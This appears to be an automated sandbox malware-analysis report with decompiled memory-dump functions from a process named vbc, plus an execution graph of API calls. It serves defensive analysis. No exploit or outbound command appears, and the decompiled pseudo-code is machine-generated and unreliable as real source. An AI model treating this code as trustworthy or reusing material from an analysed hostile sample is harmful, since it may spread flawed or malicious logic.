                                                    0x0092058f
                                                    0x00920583
                                                    0x00000000

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00942206
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-4236105082
                                                    • Opcode ID: 7f8399c3b9ea445a357b7054912a45873d2b1d515a6ae292e473facf150e1592
                                                    • Instruction ID: 793d0a2ddc17d124f23479943d463c3082c7fe029ffe019ac97662dd03e1cd72
                                                    • Opcode Fuzzy Hash: 7f8399c3b9ea445a357b7054912a45873d2b1d515a6ae292e473facf150e1592
                                                    • Instruction Fuzzy Hash: 91513831B442116FEB14DF19DC81FA633AEBFD8720F218229FD59DB286D965EC418B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009214C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 64%
                                                    			E009214C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x9c2088; // 0x752eead3
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00917707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E009213CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00917707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00917707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E008E2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E008EE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                    0x009214c0
                                                    0x009214cb
                                                    0x009214d2
                                                    0x009214d6
                                                    0x009214da
                                                    0x009214de
                                                    0x009214e3
                                                    0x0092157a
                                                    0x0092157a
                                                    0x009214f1
                                                    0x009214f3
                                                    0x0094ea0f
                                                    0x00000000
                                                    0x0094ea15
                                                    0x00000000
                                                    0x0094ea15
                                                    0x009214f9
                                                    0x009214f9
                                                    0x009214fe
                                                    0x00921504
                                                    0x0094ea1a
                                                    0x0094ea1f
                                                    0x0094ea21
                                                    0x0094ea22
                                                    0x0094ea27
                                                    0x0094ea2a
                                                    0x0094ea2a
                                                    0x00921515
                                                    0x00921517
                                                    0x0092156d
                                                    0x00921572
                                                    0x00921575
                                                    0x00921575
                                                    0x0092151e
                                                    0x0094ea50
                                                    0x0094ea55
                                                    0x0094ea58
                                                    0x0094ea58
                                                    0x0092152e
                                                    0x00921531
                                                    0x00921533
                                                    0x00000000
                                                    0x00921535
                                                    0x00921541
                                                    0x00921549
                                                    0x00921549
                                                    0x00921533
                                                    0x009214f3
                                                    0x00921559

                                                    APIs
                                                    • ___swprintf_l.LIBCMT ref: 0094EA22
                                                      • Part of subcall function 009213CB: ___swprintf_l.LIBCMT ref: 0092146B
                                                      • Part of subcall function 009213CB: ___swprintf_l.LIBCMT ref: 00921490
                                                    • ___swprintf_l.LIBCMT ref: 0092156D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: 71d5ca907205cd4976efabcda740ac7818ff484fdcb5ac6cef4c810901f504f8
                                                    • Instruction ID: b86a9c3584357acc35dd5c5c0693380c57c963b60c5937a2bbfa751d57c5921c
                                                    • Opcode Fuzzy Hash: 71d5ca907205cd4976efabcda740ac7818ff484fdcb5ac6cef4c810901f504f8
                                                    • Instruction Fuzzy Hash: A621C372A002299BCF21DE58DC41EEAB3BCFBA0700F444551FC46D3245DB749A698BE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009053A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 44%
                                                    			E009053A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009c01c0;
									_push(_t92);
									_push(0);
									_t37 = E008DF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = L00924FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									L00933F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									L00933F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0096217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L00933F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00923915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00905384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = L008DF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00923915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = L008DF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00923915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = L008DF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00923915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E00905329(_t74, _t92);
													_push(1);
													return E009053A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

























                                                    0x009053ab
                                                    0x009053ae
                                                    0x009053b1
                                                    0x009053b4
                                                    0x009053b7
                                                    0x009205b6
                                                    0x009205c0
                                                    0x009205c3
                                                    0x00000000
                                                    0x009205c9
                                                    0x009205c9
                                                    0x009205cc
                                                    0x009205d5
                                                    0x009205d5
                                                    0x009053bd
                                                    0x009053bd
                                                    0x009053bd
                                                    0x009053be
                                                    0x009053be
                                                    0x009053be
                                                    0x009053c0
                                                    0x00000000
                                                    0x00000000
                                                    0x00942269
                                                    0x0094226d
                                                    0x00942349
                                                    0x0094234d
                                                    0x00942273
                                                    0x00942276
                                                    0x00942279
                                                    0x0094227e
                                                    0x00942283
                                                    0x00942287
                                                    0x0094228a
                                                    0x0094228d
                                                    0x0094228f
                                                    0x009422bc
                                                    0x009422bc
                                                    0x009422bc
                                                    0x009422be
                                                    0x009422c4
                                                    0x009422cc
                                                    0x009422d0
                                                    0x009422d6
                                                    0x009422d7
                                                    0x009422da
                                                    0x009422df
                                                    0x009422e4
                                                    0x00000000
                                                    0x00000000
                                                    0x009422e6
                                                    0x009422e9
                                                    0x009422f4
                                                    0x009422f9
                                                    0x009422fa
                                                    0x00942305
                                                    0x00942314
                                                    0x00942319
                                                    0x0094231a
                                                    0x0094231d
                                                    0x00942320
                                                    0x00942323
                                                    0x00942323
                                                    0x00942328
                                                    0x0094232d
                                                    0x0094232f
                                                    0x00942331
                                                    0x00942336
                                                    0x00942336
                                                    0x0094233b
                                                    0x0094233d
                                                    0x00942350
                                                    0x00942351
                                                    0x00942356
                                                    0x00942359
                                                    0x00942359
                                                    0x0094235b
                                                    0x0094235d
                                                    0x00905367
                                                    0x0090536b
                                                    0x00905372
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00942363
                                                    0x00942363
                                                    0x00942369
                                                    0x0094236a
                                                    0x0094236c
                                                    0x00942371
                                                    0x00942373
                                                    0x00000000
                                                    0x00942379
                                                    0x00942379
                                                    0x0094237a
                                                    0x0094237f
                                                    0x0094237f
                                                    0x00942385
                                                    0x00942386
                                                    0x00942389
                                                    0x0094238e
                                                    0x00942390
                                                    0x00905378
                                                    0x0090537c
                                                    0x00942396
                                                    0x00942396
                                                    0x00942397
                                                    0x0094239c
                                                    0x009423a2
                                                    0x009423a3
                                                    0x009423a6
                                                    0x009423ab
                                                    0x009423ad
                                                    0x00000000
                                                    0x009423b3
                                                    0x009423b3
                                                    0x009423b4
                                                    0x009423b9
                                                    0x009423ba
                                                    0x009423ba
                                                    0x009423bc
                                                    0x009423bf
                                                    0x00000000
                                                    0x00000000
                                                    0x00939153
                                                    0x00939158
                                                    0x0093915a
                                                    0x0093915e
                                                    0x00939160
                                                    0x00000000
                                                    0x00939166
                                                    0x00939166
                                                    0x00939171
                                                    0x00939176
                                                    0x00939176
                                                    0x00000000
                                                    0x00939160
                                                    0x009423c6
                                                    0x009423cb
                                                    0x009423d7
                                                    0x009423d7
                                                    0x009423ad
                                                    0x00942390
                                                    0x00942373
                                                    0x0094233f
                                                    0x0094233f
                                                    0x00000000
                                                    0x0094233f
                                                    0x00942291
                                                    0x00942291
                                                    0x00942293
                                                    0x00942295
                                                    0x0094229a
                                                    0x009422a1
                                                    0x009422a3
                                                    0x009422a7
                                                    0x009422a9
                                                    0x00000000
                                                    0x00000000
                                                    0x009422ab
                                                    0x009422ad
                                                    0x009422af
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x009422af
                                                    0x009422b1
                                                    0x009422b4
                                                    0x009422b4
                                                    0x009422b6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x009422b6
                                                    0x0094228f
                                                    0x00000000
                                                    0x0094226d
                                                    0x009053cb
                                                    0x009053ce
                                                    0x009053d0
                                                    0x009053d4
                                                    0x009053d6
                                                    0x00000000
                                                    0x009053d8
                                                    0x009053e3
                                                    0x009053ea
                                                    0x009053ea
                                                    0x009053d6
                                                    0x00000000

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009422F4
                                                    Strings
                                                    • RTL: Re-Waiting, xrefs: 00942328
                                                    • RTL: Resource at %p, xrefs: 0094230B
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009422FC
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-871070163
                                                    • Opcode ID: b91340d17bf77faace0eef8e4eaa658ae49916064c143a4ddc1e9862bec382eb
                                                    • Instruction ID: 981150c3536c3a050b69dd4708f98fb73769ec028dfe72511bbc16febd22fefc
                                                    • Opcode Fuzzy Hash: b91340d17bf77faace0eef8e4eaa658ae49916064c143a4ddc1e9862bec382eb
                                                    • Instruction Fuzzy Hash: B8512671600711ABEB149F28CC81FA773ACFF94760F114229FD18DB281EAA5ED418BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Analysis Process: cmd.exe PID: 2568 Parent PID: 1764 cmd.exeCOMMON

                                                    Execution Graph

                                                    Execution Coverage:2.1%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:663
                                                    Total number of Limit Nodes:82

                                                    Graph

                                                    execution_graph 65636 dd47d 65639 d9c90 65636->65639 65640 d9cb6 65639->65640 65647 c8b70 65640->65647 65642 d9cc2 65646 d9ce9 65642->65646 65655 c7e50 65642->65655 65687 d8940 65646->65687 65650 c8b7d 65647->65650 65690 c8ac0 65647->65690 65649 c8b84 65649->65642 65650->65649 65702 c8a60 65650->65702 65656 c7e77 65655->65656 66115 ca020 65656->66115 65658 c7e89 66119 c9d70 65658->66119 65660 c7ea6 65668 c7ead 65660->65668 66164 c9ca0 LdrLoadDll 65660->66164 65662 c7ff4 65662->65646 65664 c7f16 65664->65662 65665 da290 LdrLoadDll 65664->65665 65666 c7f2c 65665->65666 65667 da290 LdrLoadDll 65666->65667 65669 c7f3d 65667->65669 65668->65662 66123 cd180 65668->66123 65670 da290 LdrLoadDll 65669->65670 65671 c7f4e 65670->65671 66135 caee0 65671->66135 65673 c7f61 65674 d3a60 7 API calls 65673->65674 65675 c7f72 65674->65675 65676 d3a60 7 API calls 65675->65676 65677 c7f83 65676->65677 65678 c7fa3 65677->65678 66165 cba50 8 API calls 65677->66165 65679 d3a60 7 API calls 65678->65679 65683 c7feb 65678->65683 65685 c7fba 65679->65685 65681 c7f9c 66166 cb030 LdrLoadDll 65681->66166 66147 c7c80 65683->66147 65685->65683 66167 cbaf0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 65685->66167 65688 d895f 65687->65688 65689 d91f0 LdrLoadDll 65687->65689 65689->65688 65691 c8ad3 65690->65691 65741 d6e60 LdrLoadDll 65690->65741 65721 d6d10 65691->65721 65694 c8ae6 65694->65650 65695 c8adc 65695->65694 65724 d9540 65695->65724 65697 c8b23 65697->65694 65735 c88e0 65697->65735 65699 c8b43 65742 c8330 LdrLoadDll 65699->65742 65701 c8b55 65701->65650 65703 c8a7a 65702->65703 65704 d9830 LdrLoadDll 65702->65704 66090 d9830 65703->66090 65704->65703 65707 d9830 LdrLoadDll 65708 c8aa1 65707->65708 65709 ccf80 65708->65709 65710 ccf99 65709->65710 66098 c9ea0 65710->66098 65712 ccfac 66102 d8470 65712->66102 65716 ccfd2 65717 ccffd 65716->65717 66108 d84f0 65716->66108 65719 d8720 2 API calls 65717->65719 65720 c8b95 65719->65720 65720->65642 65743 d8890 65721->65743 65725 d9559 65724->65725 65756 d3a60 65725->65756 65727 d9571 65728 d957a 65727->65728 65795 d9380 65727->65795 65728->65697 65730 d958e 65730->65728 65813 d8190 65730->65813 66068 c6e30 65735->66068 65737 c8901 65737->65699 65738 c88fa 65738->65737 66081 c70f0 65738->66081 65741->65691 65742->65701 65744 d6d25 65743->65744 65746 d91f0 65743->65746 65744->65695 65747 d9200 65746->65747 65749 d9222 65746->65749 65750 d3e60 65747->65750 65749->65744 65751 d3e7a 65750->65751 65752 d3e6e 65750->65752 65751->65749 65752->65751 65755 d42e0 LdrLoadDll 65752->65755 65754 d3fcc 65754->65749 65755->65754 65757 d3d95 65756->65757 65758 d3a74 65756->65758 65757->65727 65758->65757 65821 d7ee0 65758->65821 65761 d3ba0 65824 d85f0 65761->65824 65762 d3b83 65881 d86f0 LdrLoadDll 65762->65881 65765 d3b8d 65765->65727 65766 d3bc7 65767 da0c0 2 API calls 65766->65767 65771 d3bd3 65767->65771 65768 d3d59 65769 d8720 2 API calls 65768->65769 65772 d3d60 65769->65772 65770 d3d6f 65890 d37a0 LdrLoadDll NtReadFile NtClose 65770->65890 65771->65765 65771->65768 65771->65770 65775 d3c62 65771->65775 65772->65727 65774 d3d82 65774->65727 65776 d3cc9 65775->65776 65778 d3c71 65775->65778 65776->65768 65777 d3cdc 65776->65777 65883 d8570 65777->65883 65780 d3c8a 65778->65780 65781 d3c76 65778->65781 65784 d3c8f 65780->65784 65785 d3ca7 65780->65785 65882 d3660 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 65781->65882 65827 d3700 65784->65827 65785->65772 65839 d3420 65785->65839 65788 d3c80 65788->65727 65789 d3c9d 65789->65727 65791 d3d3c 65887 d8720 65791->65887 65792 d3cbf 65792->65727 65794 d3d48 65794->65727 65796 d9391 65795->65796 65797 d93a3 65796->65797 65908 da040 65796->65908 65797->65730 65799 d93c4 65912 d3070 65799->65912 65801 d9410 65801->65730 65802 d93e7 65802->65801 65803 d3070 2 API calls 65802->65803 65806 d9409 65803->65806 65805 d949a 65807 d94aa 65805->65807 66038 d9190 LdrLoadDll 65805->66038 65806->65801 65944 d43a0 65806->65944 65954 d9000 65807->65954 65810 d94d8 66033 d8150 65810->66033 65814 d91f0 LdrLoadDll 65813->65814 65815 d81ac 65814->65815 66064 21efae8 LdrInitializeThunk 65815->66064 65816 d81c7 65818 da0c0 65816->65818 65819 d95e9 65818->65819 66065 d8900 65818->66065 65819->65697 65822 d91f0 LdrLoadDll 65821->65822 65823 d3b54 65822->65823 65823->65761 65823->65762 65823->65765 65825 d91f0 LdrLoadDll 65824->65825 65826 d860c NtCreateFile 65825->65826 65826->65766 65828 d371c 65827->65828 65829 d8570 LdrLoadDll 65828->65829 65830 d373d 65829->65830 65831 d3758 65830->65831 65832 d3744 65830->65832 65833 d8720 2 API calls 65831->65833 65834 d8720 2 API calls 65832->65834 65835 d3761 65833->65835 65836 d374d 65834->65836 65891 da2d0 LdrLoadDll 65835->65891 65836->65789 65838 d376c 65838->65789 65840 d349e 65839->65840 65841 d346b 65839->65841 65843 d35e9 65840->65843 65846 d34ba 65840->65846 65842 d8570 LdrLoadDll 65841->65842 65845 d3486 65842->65845 65844 d8570 LdrLoadDll 65843->65844 65851 d3604 65844->65851 65847 d8720 2 API calls 65845->65847 65849 d8570 LdrLoadDll 65846->65849 65848 d348f 65847->65848 65848->65792 65850 d34d5 65849->65850 65853 d34dc 65850->65853 65854 d34f1 65850->65854 65904 d85b0 LdrLoadDll 65851->65904 65856 d8720 2 API calls 65853->65856 65857 d350c 65854->65857 65858 d34f6 65854->65858 65855 d363e 65859 d8720 2 API calls 65855->65859 65860 d34e5 65856->65860 65867 d3511 65857->65867 65900 da290 65857->65900 65861 d8720 2 API calls 65858->65861 65862 d3649 65859->65862 65860->65792 65863 d34ff 65861->65863 65862->65792 65863->65792 65864 d3523 65864->65792 65867->65864 65892 d86a0 65867->65892 65868 d3577 65869 d358e 65868->65869 65903 d8530 LdrLoadDll 65868->65903 65871 d35aa 65869->65871 65872 d3595 65869->65872 65873 d8720 2 API calls 65871->65873 65874 d8720 2 API calls 65872->65874 65875 d35b3 65873->65875 65874->65864 65876 d35df 65875->65876 65895 d9e90 65875->65895 65876->65792 65878 d35ca 65879 da0c0 2 API calls 65878->65879 65880 d35d3 65879->65880 65880->65792 65881->65765 65882->65788 65884 d3d24 65883->65884 65885 d91f0 LdrLoadDll 65883->65885 65886 d85b0 LdrLoadDll 65884->65886 65885->65884 65886->65791 65888 d873c NtClose 65887->65888 65889 d91f0 LdrLoadDll 65887->65889 65888->65794 65889->65888 65890->65774 65891->65838 65893 d91f0 LdrLoadDll 65892->65893 65894 d86bc NtReadFile 65893->65894 65894->65868 65896 d9e9d 65895->65896 65897 d9eb4 65895->65897 65896->65897 65898 da290 LdrLoadDll 65896->65898 65897->65878 65899 d9ecb 65898->65899 65899->65878 65905 d88c0 65900->65905 65902 da2a8 65902->65867 65903->65869 65904->65855 65906 d91f0 LdrLoadDll 65905->65906 65907 d88dc 65906->65907 65907->65902 65909 da057 65908->65909 66039 d87d0 65909->66039 65913 d3081 65912->65913 65914 d3089 65912->65914 65913->65802 65943 d335c 65914->65943 66042 db270 65914->66042 65916 d30dd 65917 db270 LdrLoadDll 65916->65917 65923 d30e8 65917->65923 65918 d3136 65920 db270 LdrLoadDll 65918->65920 65924 d314a 65920->65924 65921 db3a0 2 API calls 65921->65923 65922 d31a7 65925 db270 LdrLoadDll 65922->65925 65923->65918 65923->65921 66056 db310 LdrLoadDll RtlFreeHeap 65923->66056 65924->65922 66047 db3a0 65924->66047 65926 d31bd 65925->65926 65928 d31fa 65926->65928 65930 db3a0 2 API calls 65926->65930 65929 db270 LdrLoadDll 65928->65929 65931 d3205 65929->65931 65930->65926 65932 db3a0 2 API calls 65931->65932 65939 d323f 65931->65939 65932->65931 65935 db2d0 2 API calls 65936 d333e 65935->65936 65937 db2d0 2 API calls 65936->65937 65938 d3348 65937->65938 65940 db2d0 2 API calls 65938->65940 66053 db2d0 65939->66053 65941 d3352 65940->65941 65942 db2d0 2 API calls 65941->65942 65942->65943 65943->65802 65945 d43b1 65944->65945 65946 d3a60 7 API calls 65945->65946 65947 d43c7 65946->65947 65948 d4415 65947->65948 65949 d4402 65947->65949 65953 d441a 65947->65953 65951 da0c0 2 API calls 65948->65951 65950 da0c0 2 API calls 65949->65950 65952 d4407 65950->65952 65951->65953 65952->65805 65953->65805 65955 d9014 65954->65955 65956 d8ec0 LdrLoadDll 65954->65956 66057 d8ec0 65955->66057 65956->65955 65959 d8ec0 LdrLoadDll 65960 d9026 65959->65960 65961 d8ec0 LdrLoadDll 65960->65961 65962 d902f 65961->65962 65963 d8ec0 LdrLoadDll 65962->65963 65964 d9038 65963->65964 65965 d8ec0 LdrLoadDll 65964->65965 65966 d9041 65965->65966 65967 d8ec0 LdrLoadDll 65966->65967 65968 d904d 65967->65968 65969 d8ec0 LdrLoadDll 65968->65969 65970 d9056 65969->65970 65971 d8ec0 LdrLoadDll 65970->65971 65972 d905f 65971->65972 65973 d8ec0 LdrLoadDll 65972->65973 65974 d9068 65973->65974 65975 d8ec0 LdrLoadDll 65974->65975 65976 d9071 65975->65976 65977 d8ec0 LdrLoadDll 65976->65977 65978 d907a 65977->65978 65979 d8ec0 LdrLoadDll 65978->65979 65980 d9086 65979->65980 65981 d8ec0 LdrLoadDll 65980->65981 65982 d908f 65981->65982 65983 d8ec0 LdrLoadDll 65982->65983 65984 d9098 65983->65984 65985 d8ec0 LdrLoadDll 65984->65985 65986 d90a1 65985->65986 65987 d8ec0 LdrLoadDll 65986->65987 65988 d90aa 65987->65988 65989 d8ec0 LdrLoadDll 65988->65989 65990 d90b3 65989->65990 65991 d8ec0 LdrLoadDll 65990->65991 65992 d90bf 65991->65992 65993 d8ec0 LdrLoadDll 65992->65993 65994 d90c8 65993->65994 65995 d8ec0 LdrLoadDll 65994->65995 65996 d90d1 65995->65996 65997 d8ec0 LdrLoadDll 65996->65997 65998 d90da 65997->65998 65999 d8ec0 LdrLoadDll 65998->65999 66000 d90e3 65999->66000 66001 d8ec0 LdrLoadDll 66000->66001 66002 d90ec 66001->66002 66003 d8ec0 LdrLoadDll 66002->66003 66004 d90f8 66003->66004 66005 d8ec0 LdrLoadDll 66004->66005 66006 d9101 66005->66006 66007 d8ec0 LdrLoadDll 66006->66007 66008 d910a 66007->66008 66009 d8ec0 LdrLoadDll 66008->66009 66010 d9113 66009->66010 66011 d8ec0 LdrLoadDll 66010->66011 66012 d911c 66011->66012 66013 d8ec0 LdrLoadDll 66012->66013 66014 d9125 66013->66014 66015 d8ec0 LdrLoadDll 66014->66015 66016 d9131 66015->66016 66017 d8ec0 LdrLoadDll 66016->66017 66018 d913a 66017->66018 66019 d8ec0 LdrLoadDll 66018->66019 